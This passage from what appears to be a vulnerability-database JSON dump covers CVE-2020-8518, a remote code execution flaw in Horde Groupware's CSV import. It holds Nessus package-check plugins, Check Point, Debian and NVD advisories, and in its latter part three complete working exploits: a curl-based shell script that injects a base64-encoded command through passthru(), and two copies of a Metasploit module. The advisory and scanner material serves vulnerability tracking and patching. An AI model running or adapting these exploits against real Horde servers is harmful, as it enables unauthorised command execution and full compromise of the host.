php-horde-Horde-Data (2020-1e7cc91d55)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-03-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-horde-Horde-Data", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2020-1E7CC91D55.NASL", "href": "https://www.tenable.com/plugins/nessus/133702", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-1e7cc91d55.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133702);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/25\");\n\n script_cve_id(\"CVE-2020-8518\");\n script_xref(name:\"FEDORA\", value:\"2020-1e7cc91d55\");\n\n script_name(english:\"Fedora 31 : php-horde-Horde-Data (2020-1e7cc91d55)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"**Horde_Data 2.1.5**\n\n - [jan] Fix Remote Code Execution vulnerability\n (CVE-2020-8518, Reported by: Andrea Cardaci/SSD).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-1e7cc91d55\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-horde-Horde-Data package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Horde CSV import arbitrary PHP code execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-horde-Horde-Data\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"php-horde-Horde-Data-2.1.5-1.fc31\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-horde-Horde-Data\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:18:13", "description": "**Horde_Data 2.1.5**\n\n - [jan] Fix Remote Code Execution vulnerability (CVE-2020-8518, Reported by: Andrea Cardaci/SSD).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-02-14T00:00:00", "type": "nessus", "title": "Fedora 30 : php-horde-Horde-Data (2020-0248ad925e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-03-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-horde-Horde-Data", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2020-0248AD925E.NASL", "href": "https://www.tenable.com/plugins/nessus/133701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-0248ad925e.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133701);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/25\");\n\n script_cve_id(\"CVE-2020-8518\");\n script_xref(name:\"FEDORA\", value:\"2020-0248ad925e\");\n\n script_name(english:\"Fedora 30 : php-horde-Horde-Data (2020-0248ad925e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"**Horde_Data 2.1.5**\n\n - [jan] Fix Remote Code Execution vulnerability\n (CVE-2020-8518, Reported by: Andrea Cardaci/SSD).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-0248ad925e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-horde-Horde-Data package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Horde CSV import arbitrary PHP code execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-horde-Horde-Data\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"php-horde-Horde-Data-2.1.5-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-horde-Horde-Data\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:41", "description": "A remote code execution vulnerability exists in Horde Groupware. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-03T00:00:00", "type": "checkpoint_advisories", "title": "Horde Groupware Remote Code Execution (CVE-2020-8518)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2021-02-16T00:00:00", "id": "CPAI-2020-0423", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-01-04T14:59:25", "description": "Package : php-horde-data\nVersion : 2.1.0-5+deb8u1\nCVE ID : CVE-2020-8518\nDebian Bug : 951537\n\n\nA remote code execution vulnerability was discovered in the Horde\nApplication Framework. An authenticated remote attacker could use this\nflaw to cause execution of uploaded CSV data.\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n2.1.0-5+deb8u1.\n\nWe recommend that you upgrade your php-horde-data packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T03:02:53", "type": "debian", "title": "[SECURITY] [DLA 2174-1] php-horde-data security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2020-04-15T03:02:53", "id": "DEBIAN:DLA-2174-1:6CB8F", "href": "https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T19:00:17", "description": "Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-17T15:15:00", "type": "cve", "title": "CVE-2020-8518", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2022-01-01T19:54:00", "cpe": ["cpe:/o:fedoraproject:fedora:30", "cpe:/a:horde:groupware:5.2.22", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:fedoraproject:fedora:31"], "id": "CVE-2020-8518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8518", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:a:horde:groupware:5.2.22:*:*:*:webmail:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2020-03-15T15:06:40", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34096", "href": "https://0day.today/exploit/description/34096", "sourceData": "#!/bin/sh\r\n\r\nif [ \"$#\" -ne 4 ]; then\r\n echo '[!] Usage: <url> <username> <password> <command>' 1>&2\r\n exit 1\r\nfi\r\n\r\nBASE=\"$1\"\r\nUSERNAME=\"$2\"\r\nPASSWORD=\"$3\"\r\nCOMMAND=\"$4\"\r\n\r\nJAR=\"$(mktemp)\"\r\ntrap 'rm -f \"$JAR\"' EXIT\r\n\r\necho \"[+] Logging in as $USERNAME:$PASSWORD\" 1>&2\r\ncurl -si -c \"$JAR\" \"$BASE/login.php\" \\\r\n -d 'login_post=1' \\\r\n -d \"horde_user=$USERNAME\" \\\r\n -d \"horde_pass=$PASSWORD\" | grep -q 'Location: /services/portal/' || \\\r\n echo '[!] Cannot log in' 1>&2\r\n\r\necho \"[+] Uploading dummy file\" 1>&2\r\necho x | curl -si -b \"$JAR\" \"$BASE/mnemo/data.php\" \\\r\n -F 'actionID=11' \\\r\n -F 'import_step=1' \\\r\n -F 'import_format=csv' \\\r\n -F 'notepad_target=x' \\\r\n -F '[email\u00a0protected];filename=x' \\\r\n -so /dev/null\r\n\r\necho \"[+] Running command\" 1>&2\r\nBASE64_COMMAND=\"$(echo -n \"$COMMAND 2>&1\" | base64 -w0)\"\r\ncurl -b \"$JAR\" \"$BASE/mnemo/data.php\" \\\r\n -d 'actionID=3' \\\r\n -d 'import_step=2' \\\r\n -d 'import_format=csv' \\\r\n -d 'header=1' \\\r\n -d 'fields=1' \\\r\n -d 'sep=x' \\\r\n --data-urlencode \"quote=).passthru(base64_decode(\\\"$BASE64_COMMAND\\\")).die();}//\\\\\"\n\n# 0day.today [2020-03-15] #", "sourceHref": "https://0day.today/exploit/34096", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-24T09:23:22", "description": "The Horde_Data module version 2.1.4 (and before) present in Horde Groupware version 5.2.22 allows authenticated users to inject arbitrary PHP code thus achieving remote code execution the server hosting the web application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-23T00:00:00", "type": "zdt", "title": "Horde 5.2.22 CSV Import Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2020-03-23T00:00:00", "id": "1337DAY-ID-34133", "href": "https://0day.today/exploit/description/34133", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(\n update_info(\n info,\n 'Name' => 'Horde CSV import arbitrary PHP code execution',\n 'Description' => %q{\n\n The Horde_Data module version 2.1.4 (and before) present in Horde\n Groupware version 5.2.22 allows authenticated users to inject\n arbitrary PHP code thus achieving RCE on the server hosting the web\n application.\n\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Andrea Cardaci <[email\u00a0protected]>'],\n 'References' => [\n ['CVE', '2020-8518'],\n ['URL', 'https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/']\n ],\n 'DisclosureDate' => '2020-02-07',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Automatic', {}]],\n 'Payload' => {'BadChars' => \"'\"},\n 'Privileged' => false,\n 'DefaultOptions' => { 'PrependFork' => true },\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the web application', '/']),\n OptString.new('USERNAME', [true, 'The username to authenticate with']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with'])\n ])\n end\n\n def login\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'login.php'),\n 'cookie' => 'Horde=x', # avoid multiple Set-Cookie\n 'vars_post' => {\n 'horde_user' => username,\n 'horde_pass' => password,\n 'login_post' => '1'})\n unless res && res.code == 302 && res.headers['Location'].include?('/services/portal/')\n fail_with(Failure::UnexpectedReply, 'Login failed or application not found')\n end\n\n vprint_good(\"Logged in as #{username}:#{password}\")\n return res.get_cookies\n end\n\n def upload_csv(cookie)\n csv_fname = Rex::Text.rand_text_alpha(6..8)\n\n data = Rex::MIME::Message.new\n data.add_part('11', nil, nil, 'form-data; name=\"actionID\"')\n data.add_part('1', nil, nil, 'form-data; name=\"import_step\"')\n data.add_part('csv', nil, nil, 'form-data; name=\"import_format\"')\n data.add_part('x', nil, nil, 'form-data; name=\"notepad_target\"')\n data.add_part(csv_fname, nil, nil, \"form-data; name=\\\"import_file\\\"; filename=\\\"#{csv_fname}\\\"\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'mnemo/data.php'),\n 'cookie' => cookie,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s)\n\n vprint_status(\"Uploading #{csv_fname}.csv\")\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Cannot upload the CSV file')\n end\n\n vprint_good('CSV file uploaded')\n end\n\n def execute(cookie, function_call)\n options = {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'mnemo/data.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'actionID' => '3',\n 'import_step' => '2',\n 'import_format' => 'csv',\n 'header' => '1',\n 'fields' => '1',\n 'sep' => 'x',\n 'quote' => \").#{function_call}.die();}//\\\\\"}}\n\n send_request_cgi(options)\n end\n\n def exploit\n cookie = login()\n upload_csv(cookie)\n # do not terminate the statement\n function_call = payload.encoded.tr(';', '')\n vprint_status(\"Sending payload: #{function_call}\")\n execute(cookie, function_call)\n end\nend\n", "sourceHref": "https://0day.today/exploit/34133", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-25T06:52:18", "description": "", "cvss3": {}, "published": "2020-03-23T00:00:00", "type": "packetstorm", "title": "Horde 5.2.22 CSV Import Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-03-23T00:00:00", "id": "PACKETSTORM:156872", "href": "https://packetstormsecurity.com/files/156872/Horde-5.2.22-CSV-Import-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Horde CSV import arbitrary PHP code execution', \n'Description' => %q{ \n \nThe Horde_Data module version 2.1.4 (and before) present in Horde \nGroupware version 5.2.22 allows authenticated users to inject \narbitrary PHP code thus achieving RCE on the server hosting the web \napplication. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => ['Andrea Cardaci <cyrus.and@gmail.com>'], \n'References' => [ \n['CVE', '2020-8518'], \n['URL', 'https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/'] \n], \n'DisclosureDate' => '2020-02-07', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Automatic', {}]], \n'Payload' => {'BadChars' => \"'\"}, \n'Privileged' => false, \n'DefaultOptions' => { 'PrependFork' => true }, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the web application', '/']), \nOptString.new('USERNAME', [true, 'The username to authenticate with']), \nOptString.new('PASSWORD', [true, 'The password to authenticate with']) \n]) \nend \n \ndef login \nusername = datastore['USERNAME'] \npassword = datastore['PASSWORD'] \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'login.php'), \n'cookie' => 'Horde=x', # avoid multiple Set-Cookie \n'vars_post' => { \n'horde_user' => username, \n'horde_pass' => password, \n'login_post' => '1'}) \nunless res && res.code == 302 && res.headers['Location'].include?('/services/portal/') \nfail_with(Failure::UnexpectedReply, 'Login failed or application not found') \nend \n \nvprint_good(\"Logged in as #{username}:#{password}\") \nreturn res.get_cookies \nend \n \ndef upload_csv(cookie) \ncsv_fname = Rex::Text.rand_text_alpha(6..8) \n \ndata = Rex::MIME::Message.new \ndata.add_part('11', nil, nil, 'form-data; name=\"actionID\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"import_step\"') \ndata.add_part('csv', nil, nil, 'form-data; name=\"import_format\"') \ndata.add_part('x', nil, nil, 'form-data; name=\"notepad_target\"') \ndata.add_part(csv_fname, nil, nil, \"form-data; name=\\\"import_file\\\"; filename=\\\"#{csv_fname}\\\"\") \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'mnemo/data.php'), \n'cookie' => cookie, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s) \n \nvprint_status(\"Uploading #{csv_fname}.csv\") \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Cannot upload the CSV file') \nend \n \nvprint_good('CSV file uploaded') \nend \n \ndef execute(cookie, function_call) \noptions = { \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'mnemo/data.php'), \n'cookie' => cookie, \n'vars_post' => { \n'actionID' => '3', \n'import_step' => '2', \n'import_format' => 'csv', \n'header' => '1', \n'fields' => '1', \n'sep' => 'x', \n'quote' => \").#{function_call}.die();}//\\\\\"}} \n \nsend_request_cgi(options) \nend \n \ndef exploit \ncookie = login() \nupload_csv(cookie) \n# do not terminate the statement \nfunction_call = payload.encoded.tr(';', '') \nvprint_status(\"Sending payload: #{function_call}\") \nexecute(cookie, function_call) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156872/horde_csv_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}